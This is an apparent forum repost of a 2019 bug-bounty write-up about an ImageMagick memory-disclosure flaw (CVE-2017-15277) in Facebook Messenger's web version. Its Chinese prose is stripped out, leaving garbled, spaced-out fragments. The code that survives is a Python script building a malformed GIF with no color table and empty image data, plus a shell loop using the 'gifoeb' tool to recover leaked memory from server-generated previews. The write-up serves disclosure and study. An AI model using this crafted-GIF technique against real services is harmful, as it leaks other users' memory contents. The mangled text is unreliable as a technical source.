搜索

[13900] 2019-03-23_FacebookMessenger网页版ImageMagick漏洞($10K)

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2019-03-23_FacebookMessenger网页版ImageMagick漏洞($10K) F a c e b o o k   M e s s e n g e r I m a g e M a g i c k $ 1 0 K c l o u d s   F r e e B u f   2 0 1 9 - 0 3 - 2 3 F a c e b o o k   M e s s e n g e r I m a g e M a g i c k C V E - 2 0 1 7 1 5 2 7 7 F a c e b o o k F a c e b o o k $ 1 0 , 0 0 0 I m a g e M a g i c k C V E - 2 0 1 7 1 5 2 7 7 C V E - 2 0 1 7 1 5 2 7 7 2 0 1 7 1 0 E m i l   L e r n e r I m a g e M a g i c k I m a g e M a g i c k   7 . 0 . 6 1 G r a p h i c s m a g i c k   1 . 3 . 2 6 I m a g e M a g i c k G I F I m a g e M a g i c k   7 . 0 . 6 1 G r a p h i c s m a g i c k   1 . 3 . 2 6 c o d e r s / g i f . c R e a d G I F I m a g e R e a d G I F I m a g e G I F I m a g e M a g i c k   7 . 0 . 6 1 G r a p h i c s m a g i c k   1 . 3 . 2 6 C V E - 2 0 1 7 1 5 2 7 7 S t a c k   t r a c e S t r i n g   v a l u e I m a g e M a g i c k w e b 2 0 1 8 2 F a c e b o o k   M e s s e n g e r   A P P G I F I m a g e M a g i c k C V E - 2 0 1 7 1 5 2 7 7 g i f   -   " g i f o e b " F a c e b o o k   M e s s e n g e r   g i f o e b ( N u l l p o i n t e r   D e r e f e r r e n c e ) A P P F a c e b o o k A P P F a c e b o o k   M e s s e n g e r   G I F G I F G I F
G I F G I F G I F G I F P y t h o n G I F G I F G I F C o l o r   T a b l e I m a g e   D a t a O f f s e t       L e n g t h       C o n t e n t s     0             3   b y t e s     " G I F "     3             3   b y t e s     " 8 7 a "   o r   " 8 9 a "     6             2   b y t e s     < L o g i c a l   S c r e e n   W i d t h >     8             2   b y t e s     < L o g i c a l   S c r e e n   H e i g h t >   1 0             1   b y t e       b i t   0 :         G l o b a l   C o l o r   T a b l e   F l a g   ( G C T F )                                     b i t   1 . . 3 :   C o l o r   R e s o l u t i o n                                     b i t   4 :         S o r t   F l a g   t o   G l o b a l   C o l o r   T a b l e                                     b i t   5 . . 7 :   S i z e   o f   G l o b a l   C o l o r   T a b l e :   2 ^ ( 1 + n )   1 1             1   b y t e       < B a c k g r o u n d   C o l o r   I n d e x >   1 2             1   b y t e       < P i x e l   A s p e c t   R a t i o >   1 3             ?   b y t e s     < G l o b a l   C o l o r   T a b l e ( 0 . . 2 5 5   x   3   b y t e s )   i f   G C T F   i s   o n e >                   ?   b y t e s     < B l o c k s >                   1   b y t e s     < T r a i l e r >   ( 0 x 3 b ) i m p o r t   s t r u c t s c r e e n W i d t h   =   6 4 0 s c r e e n H e i g h t   =   4 8 0 f   =   o p e n ( ' t e s t . g i f ' ,   ' w b ' ) #   O f f s e t       L e n g t h       C o n t e n t s #       0             3   b y t e s     " G I F " #       3             3   b y t e s     " 8 7 a "   o r   " 8 9 a " f . w r i t e ( b " G I F 8 9 a " ) #       6             2   b y t e s     < L o g i c a l   S c r e e n   W i d t h > f . w r i t e ( s t r u c t . p a c k ( ' < h ' ,   s c r e e n W i d t h ) ) #       8             2   b y t e s     < L o g i c a l   S c r e e n   H e i g h t > f . w r i t e ( s t r u c t . p a c k ( ' < h ' ,   s c r e e n H e i g h t ) ) #     1 0             1   b y t e       b i t   0 :         G l o b a l   C o l o r   T a b l e   F l a g   ( G C T F ) #                                       b i t   1 . . 3 :   C o l o r   R e s o l u t i o n #                                       b i t   4 :         S o r t   F l a g   t o   G l o b a l   C o l o r   T a b l e #                                       b i t   5 . . 7 :   S i z e   o f   G l o b a l   C o l o r   T a b l e :   2 ^ ( 1 + n ) b i t s   =   i n t ( ' 0 0 0 0 0 0 1 0 ' ,   2 ) f . w r i t e ( s t r u c t . p a c k ( ' < b ' ,   b i t s ) ) #     1 1             1   b y t e       < B a c k g r o u n d   C o l o r   I n d e x > f . w r i t e ( s t r u c t . p a c k ( ' < b ' ,   0 ) ) #     1 2             1   b y t e       < P i x e l   A s p e c t   R a t i o > f . w r i t e ( s t r u c t . p a c k ( ' < b ' ,   1 ) ) #     1 3             ?   b y t e s     < G l o b a l   C o l o r   T a b l e ( 0 . . 2 5 5   x   3   b y t e s )   i f   G C T F   i s   o n e > #                     ?   b y t e s     < B l o c k s > #   O f f s e t       L e n g t h       C o n t e n t s #       0             1   b y t e       I m a g e   S e p a r a t o r   ( 0 x 2 c ) f . w r i t e ( s t r u c t . p a c k ( ' < b ' ,   0 x 2 c ) ) #       1             2   b y t e s     I m a g e   L e f t   P o s i t i o n f . w r i t e ( s t r u c t . p a c k ( ' < h ' ,   0 ) ) #       3             2   b y t e s     I m a g e   T o p   P o s i t i o n f . w r i t e ( s t r u c t . p a c k ( ' < h ' ,   0 ) ) #       5             2   b y t e s     I m a g e   W i d t h f . w r i t e ( s t r u c t . p a c k ( ' < h ' ,   s c r e e n W i d t h ) ) #       7             2   b y t e s     I m a g e   H e i g h t f . w r i t e ( s t r u c t . p a c k ( ' < h ' ,   s c r e e n H e i g h t ) ) #       8             1   b y t e       b i t   0 :         L o c a l   C o l o r   T a b l e   F l a g   ( L C T F ) #                                       b i t   1 :         I n t e r l a c e   F l a g #                                       b i t   2 :         S o r t   F l a g #                                       b i t   2 . . 3 :   R e s e r v e d #                                       b i t   4 . . 7 :   S i z e   o f   L o c a l   C o l o r   T a b l e :   2 ^ ( 1 + n ) #                     ?   b y t e s     L o c a l   C o l o r   T a b l e ( 0 . . 2 5 5   x   3   b y t e s )   i f   L C T F   i s   o n e f . w r i t e ( s t r u c t . p a c k ( ' < b ' ,   i n t ( ' 0 0 0 0 0 1 0 0 ' ,   2 ) ) ) #                     1   b y t e       L Z W   M i n i m u m   C o d e   S i z e # f . w r i t e ( s t r u c t . p a c k ( ' < b ' ,   1 ) ) #   [   / /   B l o c k s #                     1   b y t e       B l o c k   S i z e   ( s ) # f . w r i t e ( s t r u c t . p a c k ( ' < b ' ,   1 ) ) #                   ( s ) b y t e s     I m a g e   D a t a #   ] * #                     1   b y t e       B l o c k   T e r m i n a t o r ( 0 x 0 0 ) # f . w r i t e ( s t r u c t . p a c k ( ' < b ' ,   0 ) ) #                     1   b y t e s     < T r a i l e r >   ( 0 x 3 b ) f . w r i t e ( s t r u c t . p a c k ( ' < b ' ,   0 x 3 b ) ) f . c l o s e ( )
F a c e b o o k   M e s s e n g e r I m a g e   D a t a F a c e b o o k   M e s s e n g e r A P P # $ & ^ % $ ( ) & @ F a c e b o o k   M e s s e n g e r F a c e b o o k   M e s s e n g e r F a c e b o o k   M e s s e n g e r
M e s s e n g e r G I F M e s s e n g e r
M e s s e n g e r M e s s e n g e r M e s s e n g e r M e s s e n g e r M e s s e n g e r P S G I F C V E - 2 0 1 7 1 5 2 7 7 g i f o e b   g i f o e b G i t h u b M e s s e n g e r
M e s s e n g e r C V E - 2 0 1 7 1 5 2 7 7 g i f o e b M e s s e n g e r H a c k e r O n e I m a g e M a g i c k f o r   p   i n   p r e v i e w s / * ;   d o         . / g i f o e b   r e c o v e r   $ p   |   s t r i n g s ;     d o n e
2 0 1 8 . 2 . 2 6     2 0 1 8 . 3 . 1         2 0 1 8 . 3 . 9         2 0 1 8 . 3 . 2 1       F a c e b o o k $ 1 0 0 0 0 * v u l n a n o c l o u d s F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理